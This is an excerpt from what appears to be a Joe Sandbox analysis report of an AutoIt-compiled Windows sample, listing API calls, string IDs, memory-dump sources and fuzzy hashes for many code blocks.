                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: BuffCharUpper_wcslen
                          • String ID: CALLARGARRAY
                          • API String ID: 157775604-1150593374
                          • Opcode ID: f328cdb2da8ca3002011b94a8e9e254a70f2a5f5a374dec8b21ac6e2893cacb3
                          • Instruction ID: 36e6eb978c583e43ff77ef27962fed673ecde4b57c7153c2534e242ca427ef7e
                          • Instruction Fuzzy Hash: 6F419D31A40209DFCB04EFA8C8859AEBBF5EF59320F10416AE505A7291E7789D81CBA0
                          APIs
                          • _wcslen.LIBCMT ref: 0077D130
                          • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0077D13A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: CrackInternet_wcslen
                          • String ID: |
                          • API String ID: 596671847-2343686810
                          • Opcode ID: ff78a221e23296f176793b0e83cae3cbd089d68207285272c1bea4911d0a2908
                          • Instruction ID: d2f60cb8892369ea6f2e2c82adc380ccf0ffa7cd0ce7522a82b643200eef464b
                          • Instruction Fuzzy Hash: 0E313071D00219EBCF15EFA4CC89AEE7FB9FF04340F404119F919A61A2E739A956CB60
                          APIs
                          • DestroyWindow.USER32(?,?,?,?), ref: 00793621
                          • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0079365C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Window$DestroyMove
                          • String ID: static
                          • API String ID: 2139405536-2160076837
                          • Opcode ID: 1aad74f5625e60d71e400aaf49cf2928d0045e005677c31097a4f548cfe28572
                          • Instruction ID: 0642f1f5fc60686db2bec77392173ae7fa2a45e33e465991569afa6bcb05aecb
                          • Instruction Fuzzy Hash: 62318D71100604AADF10DF78EC81EFB73A9FF88724F009619F8A5D7280DA39AD91D760
                          APIs
                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 0079461F
                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00794634
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID: '
                          • API String ID: 3850602802-1997036262
                          • Opcode ID: cc4a884f4712e469e016a9bf1fde3e0405a66653af4c8cfaa038d48100bfe805
                          • Instruction ID: 730b1abec8fb2a42f3b1ff864b80f080653ff5153a4e5e806c07e92786adf670
                          • Instruction Fuzzy Hash: 9E3148B5A01209AFDF14CFA9D990FDA7BB5FF09300F11416AE904AB341D734A952CF90
                          APIs
                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0079327C
                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00793287
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID: Combobox
                          • API String ID: 3850602802-2096851135
                          • Opcode ID: 23ccd10cdb54e13695d22fb25cb45528b319eaf6de557e865a763c729c9b3c5c
                          • Instruction ID: 03fe1b01f8bddba311d5faa4f1125ddd2132d8abefe2b5fc22d4db77979ffffc
                          • Instruction Fuzzy Hash: 4011B271300208BFFF25DF94EC84EBB3BAAFB94364F104129F91897290D6399D518760
                          APIs
                            • Part of subcall function 0070600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0070604C
                            • Part of subcall function 0070600E: GetStockObject.GDI32(00000011), ref: 00706060
                            • Part of subcall function 0070600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0070606A
                          • GetWindowRect.USER32(00000000,?), ref: 0079377A
                          • GetSysColor.USER32(00000012), ref: 00793794
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Window$ColorCreateMessageObjectRectSendStock
                          • String ID: static
                          • API String ID: 1983116058-2160076837
                          • Opcode ID: 6125cd42fd3ab620c38f418337c6a0ed3a9793ba271912624e3ef7e8806ffefe
                          • Instruction ID: 371b55861e451eb338e52746da79d4a7bfcc62773b54aac2a7e7d2a25feb05b8
                          • Instruction Fuzzy Hash: 781137B2610209AFDF01DFB8DC86EEA7BF8FB08314F004915F955E2250E739E8619B60
                          APIs
                          • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0077CD7D
                          • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0077CDA6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Internet$OpenOption
                          • String ID: <local>
                          • API String ID: 942729171-4266983199
                          • Opcode ID: 17c0059f5b95f66c509a50886c96c90de4e5e2e53e345a4e36cb2a131cb69533
                          • Instruction ID: 28e6d202965c43414be2bacd24c2efb4b0a31d5e685f33e02c64b0d9eb2cff6c
                          • Instruction Fuzzy Hash: AD11A371305631BADB364A668C45EE7BEA8EB1A7E4F00822EB10D82180D6689841D6F0
                          APIs
                          • GetWindowTextLengthW.USER32(00000000), ref: 007934AB
                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 007934BA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: LengthMessageSendTextWindow
                          • String ID: edit
                          • API String ID: 2978978980-2167791130
                          • Opcode ID: c49744a53165de2335519da119a3abf3b49ee194340727e0c119389b976690c2
                          • Instruction ID: 00feced8b296c065c8930d69715bdbc9d3475105495e568fa6cc185b57f587d2
                          • Instruction Fuzzy Hash: 7E118C71100248ABEF128F64EC44ABB3BAAEB05378F518724F965931E0C779EC519B64
                          APIs
                            • Part of subcall function 00709CB3: _wcslen.LIBCMT ref: 00709CBD
                          • CharUpperBuffW.USER32(?,?,?), ref: 00766CB6
                          • _wcslen.LIBCMT ref: 00766CC2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: _wcslen$BuffCharUpper
                          • String ID: STOP
                          • API String ID: 1256254125-2411985666
                          • Opcode ID: f3a03238c3142ba144cad87a02745878891848366c327a0660a741ffbb1de11b
                          • Instruction ID: 4862b81aa9de1723f5e36f510333dcb97ee23d9bba82dc5b7039fef469b0cfde
                          • Instruction Fuzzy Hash: C301C032A00926CACB21AFBDDC959BF77A5EF61710B900528ED63961D1EB39E940C660
                          APIs
                            • Part of subcall function 00709CB3: _wcslen.LIBCMT ref: 00709CBD
                            • Part of subcall function 00763CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00763CCA
                          • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00761D4C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: ClassMessageNameSend_wcslen
                          • String ID: ComboBox$ListBox
                          • API String ID: 624084870-1403004172
                          • Opcode ID: 42168789208e2d1ae5ac2a1143175d5ab7cf767d192c69510add0af9dd20e05b
                          • Instruction ID: 4e05dba166bf3995db8243288c5173ad0df272426bfc2f55128c7f9293c6cd78
                          • Instruction Fuzzy Hash: A0019271601214EBCB04ABA4CC59DFE77A8AB56350B440A19BD23672C2EA3959088660
                          APIs
                            • Part of subcall function 00709CB3: _wcslen.LIBCMT ref: 00709CBD
                            • Part of subcall function 00763CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00763CCA
                          • SendMessageW.USER32(?,00000180,00000000,?), ref: 00761C46
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: ClassMessageNameSend_wcslen
                          • String ID: ComboBox$ListBox
                          • API String ID: 624084870-1403004172
                          • Opcode ID: cfdc3c991d7b3244b0a5fa169e7a588529122e42c0e3ce2214549b0a87181f81
                          • Instruction ID: 04fbae3a86b6985f4f85448041ae7aa5cc88f4ec83ef24c6e45e7b8827510a5e
                          • Instruction Fuzzy Hash: D401A7B5A81104E6DB04EBA0C95AEFF77E89B11340F540019BD17672C2EA2D9E18D7B1
                          APIs
                            • Part of subcall function 00709CB3: _wcslen.LIBCMT ref: 00709CBD
                            • Part of subcall function 00763CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00763CCA
                          • SendMessageW.USER32(?,00000182,?,00000000), ref: 00761CC8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: ClassMessageNameSend_wcslen
                          • String ID: ComboBox$ListBox
                          • API String ID: 624084870-1403004172
                          • Opcode ID: 5e97157cd4416baaed8886cbbbfa769511f92a159590899355fb7f8ad14a459c
                          • Instruction ID: fc17d13f72a58d30eaad32fd716080e56bd31f7d0a42bb3257daed71f7d5e32d
                          • Instruction Fuzzy Hash: 4C01D6B1A80158E7DB04EBA0CA09EFF77E89B11340F580419BD03732C2EA2D9F08D671
                          APIs
                          • __Init_thread_footer.LIBCMT ref: 0071A529
                            • Part of subcall function 00709CB3: _wcslen.LIBCMT ref: 00709CBD
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Init_thread_footer_wcslen
                          • String ID: ,%}$3yu
                          • API String ID: 2551934079-347936961
                          • Opcode ID: 94d8c35a14993a5f23fb654ff8da6b6e6243461261430ef3ef80c8b9cafafce3
                          • Instruction ID: fc97476ec1df033fbd152875bb1dba91a4a856288fdd1aefd6f9de898750e180
                          • Opcode Fuzzy Hash: 94d8c35a14993a5f23fb654ff8da6b6e6243461261430ef3ef80c8b9cafafce3
                          • Instruction Fuzzy Hash: 7701F731B06610EBCB00F76CA85FA9D33659B05750F504065F602572C3EE6C5D9286E7
                          APIs
                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,007D3018,007D305C), ref: 007981BF
                          • CloseHandle.KERNEL32 ref: 007981D1
                          Strings
                          Similarity
                          • API ID: CloseCreateHandleProcess
                          • String ID: \0}
                          • API String ID: 3712363035-1796552116
                          • Opcode ID: 3e06f57b887d4d4eca668d6d48309c49453150f9ee970c20ccd3610d421685cd
                          • Instruction ID: 093467c986b53ba450a028d33ca371846265aa7f1932682456498fd97b0d34e3
                          • Opcode Fuzzy Hash: 3e06f57b887d4d4eca668d6d48309c49453150f9ee970c20ccd3610d421685cd
                          • Instruction Fuzzy Hash: 63F05EB1641314BBF720A761AC49FB73B6DDB05750F008422BB08D51A2D67D8A0183BE
                          APIs
                          Strings
                          Similarity
                          • API ID: _wcslen
                          • String ID: 3, 3, 16, 1
                          • API String ID: 176396367-3042988571
                          • Opcode ID: 03e8c4b3329bdddc055b49e66b239c2742bbd9b38d5ef9c8231579595139c034
                          • Instruction ID: a216f3a3e9f8479b3a38b0e73676a596183ce47250c07631584695c005ad2bc9
                          • Opcode Fuzzy Hash: 03e8c4b3329bdddc055b49e66b239c2742bbd9b38d5ef9c8231579595139c034
                          • Instruction Fuzzy Hash: 4AE02B422442B060923932B9ACC5A7F5689CFC5760734182FF9CAC2266EADCDDD1D3A0
                          APIs
                          • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00760B23
                          Strings
                          Similarity
                          • API ID: Message
                          • String ID: AutoIt$Error allocating memory.
                          • API String ID: 2030045667-4017498283
                          • Opcode ID: 68469a1ab000984b30006d420c46b6badc0f6eab94aecc3c25a6c4a3427b05d0
                          • Instruction ID: 4d6644b7635bcca4fb9b49b0782a37d3ee0da2828f454b0d0c967f49848b4ab1
                          • Opcode Fuzzy Hash: 68469a1ab000984b30006d420c46b6badc0f6eab94aecc3c25a6c4a3427b05d0
                          • Instruction Fuzzy Hash: D0E0D831244318B6DA1137947C0BFC97B848F05B20F10446AFB88554C38AEA349006F9
                          APIs
                            • Part of subcall function 0071F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00720D71,?,?,?,0070100A), ref: 0071F7CE
                          • IsDebuggerPresent.KERNEL32(?,?,?,0070100A), ref: 00720D75
                          • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0070100A), ref: 00720D84
                          Strings
                          • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00720D7F
                          Similarity
                          • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                          • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                          • API String ID: 55579361-631824599
                          • Opcode ID: f29998382c91e652c16dad16990121a8c80bb31b7b3dd1a875586ef778e368e6
                          • Instruction ID: 99a68a1f218288c8cdc85a82c839e0bf2a58d2bae5f49850e7525844b3621e12
                          • Opcode Fuzzy Hash: f29998382c91e652c16dad16990121a8c80bb31b7b3dd1a875586ef778e368e6
                          • Instruction Fuzzy Hash: 00E06D702013118BDB209FB8E8083427BE0BB00750F00893EE482C6692DBBCE4458BE1
                          APIs
                          • __Init_thread_footer.LIBCMT ref: 0071E3D5
                          Strings
                          Similarity
                          • API ID: Init_thread_footer
                          • String ID: 0%}$8%}
                          • API String ID: 1385522511-2688785392
                          • Opcode ID: f642bbd5c47ea6816f1ddd00b5b0d01a9769f73c86e008d6e278c9f1d701e7d2
                          • Instruction ID: 0a4def383946e59a06b7d36d1f2d692c29d79662ac50a2779ae418292758aed8
                          • Opcode Fuzzy Hash: f642bbd5c47ea6816f1ddd00b5b0d01a9769f73c86e008d6e278c9f1d701e7d2
                          • Instruction Fuzzy Hash: ADE08631419A24CBC704971CB85DEC83375BB55720B5052F7E923872D3DB3C689386A9
                          APIs
                          Strings
                          Similarity
                          • API ID: LocalTime
                          • String ID: %.3d$X64
                          • API String ID: 481472006-1077770165
                          • Opcode ID: 6d90e8d5c912c073f3fc5a872004ec8e5df3380e0f34689db0b2ef727c569fc9
                          • Instruction ID: 8b46af6b1154d82e5235f85036528b7790f7dfcfb683b59993885076f2a355d0
                          • Opcode Fuzzy Hash: 6d90e8d5c912c073f3fc5a872004ec8e5df3380e0f34689db0b2ef727c569fc9
                          • Instruction Fuzzy Hash: D5D012B1C08148E9CB7097E0CC499F9B37CBB08302F508456FD0691040D6ACDD4CAB61
                          APIs
                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0079236C
                          • PostMessageW.USER32(00000000), ref: 00792373
                            • Part of subcall function 0076E97B: Sleep.KERNEL32 ref: 0076E9F3
                          Strings
                          Similarity
                          • API ID: FindMessagePostSleepWindow
                          • String ID: Shell_TrayWnd
                          • API String ID: 529655941-2988720461
                          • Opcode ID: 82aad4ed18a66b6b033e0f63d45de9f2b55826ec3905e50267d0dab51303d1d3
                          • Instruction ID: e0ccd6cefb0ab1fc4cf2c5ccd5152a93639d0a0b2a863df0c39432ebc31f2698
                          • Opcode Fuzzy Hash: 82aad4ed18a66b6b033e0f63d45de9f2b55826ec3905e50267d0dab51303d1d3
                          • Instruction Fuzzy Hash: 14D0C976381310BAEA65A7709C4FFC666249B04B10F11896A7646AA1D4C9A8B8128A58
                          APIs
                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0079232C
                          • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0079233F
                            • Part of subcall function 0076E97B: Sleep.KERNEL32 ref: 0076E9F3
                          Strings
                          Similarity
                          • API ID: FindMessagePostSleepWindow
                          • String ID: Shell_TrayWnd
                          • API String ID: 529655941-2988720461
                          • Opcode ID: b93fdab98c36926e02c0b8c5d03354e463c940a94061982454d6da25ac38e4df
                          • Instruction ID: 302a4534075deba0410599d960366077678e17f653b1ed1a674b18e21a90076e
                          • Opcode Fuzzy Hash: b93fdab98c36926e02c0b8c5d03354e463c940a94061982454d6da25ac38e4df
                          • Instruction Fuzzy Hash: C6D01276394310B7EA64B770DC4FFC67A249F00B10F11896B7746AA1D4C9F8B812CA58